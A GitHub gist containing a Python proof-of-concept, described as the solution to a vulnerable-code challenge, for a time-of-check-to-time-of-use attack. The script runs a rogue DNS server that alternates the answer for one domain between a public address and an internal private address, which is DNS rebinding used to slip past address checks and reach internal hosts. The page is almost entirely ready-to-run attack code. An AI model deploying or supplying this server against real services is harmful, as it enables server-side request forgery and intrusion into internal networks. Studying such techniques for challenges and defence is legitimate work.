Skip to content

Instantly share code, notes, and snippets.

@2S1one
Created May 12, 2024 10:12
Show Gist options
  • Save 2S1one/309d46d7bfc4b25f7c224a51679a3cb9 to your computer and use it in GitHub Desktop.
Save 2S1one/309d46d7bfc4b25f7c224a51679a3cb9 to your computer and use it in GitHub Desktop.
# TOCTOU (time-of-check to time-of-use) - PoC
# Roy H.
# Solution for https://github.com/2S1one/vulnerable-code-snippets
# Updated for more reliability
import binascii
import copy
import socket
import struct
import sys
import time
from dnslib import DNSRecord, RR, QTYPE, RCODE
from dnslib.server import DNSServer, BaseResolver, DNSLogger
from dnslib.label import DNSLabel
DOMAIN = "abirabirtest.com."
class CustomDNSLogger(DNSLogger):
    """DNSLogger that only reports traffic whose question name is ``DOMAIN``.

    Every hook except ``log_error`` is filtered on the question name, so
    records for any other name produce no log output. Replies for
    ``DOMAIN`` are additionally counted in ``reply_counter`` and the running
    count is printed after each one.
    """

    def __init__(self, log_prefix, log_suffix):
        """Initialise the base logger and reset the reply counter.

        Both arguments are forwarded positionally, unchanged, to
        ``DNSLogger.__init__``.

        NOTE(review): despite their names, the caller in this file passes a
        comma-separated hook list and a boolean here, i.e. they appear to
        map to the base class's hook-selection and prefix-flag parameters --
        confirm against the installed dnslib version.
        """
        super().__init__(log_prefix, log_suffix)
        self.reply_counter = 0

    @staticmethod
    def _is_target(record):
        """Return True when *record*'s question name equals ``DOMAIN``.

        The comparison ignores case: DNS names are case-insensitive and
        resolvers that randomise query-name case would otherwise slip past
        the filter.
        """
        return str(record.q.qname).lower() == DOMAIN.lower()

    def log_recv(self, handler, data):
        """Log a raw received packet if it parses and targets ``DOMAIN``."""
        try:
            if self._is_target(DNSRecord.parse(data)):
                super().log_recv(handler, data)
        except Exception:
            # Best effort: unparseable packets are simply not logged.
            pass

    def log_send(self, handler, data):
        """Log a raw sent packet if it parses and targets ``DOMAIN``."""
        try:
            if self._is_target(DNSRecord.parse(data)):
                super().log_send(handler, data)
        except Exception:
            # Best effort: unparseable packets are simply not logged.
            pass

    def log_request(self, handler, request):
        """Log a parsed request only when it asks for ``DOMAIN``."""
        if self._is_target(request):
            super().log_request(handler, request)

    def log_reply(self, handler, reply):
        """Count, log, and print the running total of replies for ``DOMAIN``."""
        if self._is_target(reply):
            self.reply_counter += 1
            super().log_reply(handler, reply)
            print(self.reply_counter)

    def log_truncated(self, handler, reply):
        """Log a truncated reply only when it is for ``DOMAIN``."""
        if self._is_target(reply):
            super().log_truncated(handler, reply)

    def log_error(self, handler, e):
        """Log every error, regardless of the name involved."""
        super().log_error(handler, e)
class InterceptResolver(BaseResolver):
    """Resolver that alternates between two answer sets for ``DOMAIN``.

    Queries for ``DOMAIN`` are answered locally from ``zone_1`` or
    ``zone_2`` according to a rolling counter; every other name is
    forwarded to the fallback DNS server.
    """

    def __init__(self, intercept_1, intercept_2, fallback_dns='8.8.8.8', port=53):
        """Parse both zone definitions and store the fallback server.

        Args:
            intercept_1: iterable of zone-file strings for the first answer set.
            intercept_2: iterable of zone-file strings for the second answer set.
            fallback_dns: address of the upstream server for all other names.
            port: port of the upstream server.
        """
        self.switcher = 0
        # Default TTL handed to RR.fromZone.
        # NOTE(review): a TTL written explicitly in the zone text presumably
        # takes precedence over this default -- confirm against dnslib.
        self.ttl = 0
        self.fallback_dns = fallback_dns
        self.fallback_port = port
        self.zone_1 = self._parse_zone(intercept_1)
        self.zone_2 = self._parse_zone(intercept_2)
        print('TOU TOUC - Created Switching Zone')
        print('zone_1', self.zone_1)
        print('zone_2', self.zone_2)

    def _parse_zone(self, entries):
        """Return ``(rname, type-name, rr)`` tuples for every record in *entries*."""
        return [
            (rr.rname, QTYPE[rr.rtype], rr)
            for entry in entries
            for rr in RR.fromZone(entry, ttl=self.ttl)
        ]

    def _forward(self, request, handler, reply):
        """Relay *request* to the fallback server and return its parsed answer.

        ``DNSRecord.send`` is used so that TCP queries get the 2-byte length
        framing and large responses are read in full. On any failure the
        error is printed and *reply* is returned marked SERVFAIL, so the
        client does not mistake the failure for an empty answer.
        """
        try:
            raw = request.send(
                self.fallback_dns,
                self.fallback_port,
                tcp=(handler.protocol != 'udp'),
                timeout=1,
            )
            return DNSRecord.parse(raw)
        except Exception as e:
            print(f"Failed to forward DNS request: {e}")
            reply.header.rcode = RCODE.SERVFAIL
            return reply

    def resolve(self, request, handler):
        """Answer *request* from the switching zones or via the fallback server.

        For ``DOMAIN`` (matched case-insensitively, since DNS names are
        case-insensitive) the counter selects the zone: counter values 0 and
        1 use ``zone_1``, values 2 and 3 use ``zone_2``, then it wraps. All
        records of the selected zone are returned whatever the query type,
        with their owner name rewritten to the name as it was asked.
        """
        reply = request.reply()
        qname = request.q.qname
        if str(qname).lower() != DOMAIN.lower():
            return self._forward(request, handler, reply)

        zone = self.zone_1 if self.switcher < 2 else self.zone_2
        # Advance the counter, wrapping back to 0 after four queries.
        self.switcher = (self.switcher + 1) % 4
        for _name, _rtype, rr in zone:
            # Copy so the stored record's owner name is never mutated.
            answer = copy.copy(rr)
            answer.rname = qname
            reply.add_answer(answer)
        return reply
if __name__ == '__main__':
    # Listen on every interface on the standard DNS port.
    listen_host, listen_port = '0.0.0.0', 53

    # The two answer sets the resolver switches between for DOMAIN.
    first_zone = [f'{DOMAIN} 300 IN A 1.0.0.1']
    second_zone = [f'{DOMAIN} 300 IN A 10.28.85.66']

    server = DNSServer(
        InterceptResolver(first_zone, second_zone),
        address=listen_host,
        port=listen_port,
        logger=CustomDNSLogger('request,reply,truncated,error', False),
    )
    server.start_thread()

    # Keep the main thread alive for as long as the server thread runs.
    while server.isAlive():
        time.sleep(0.1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment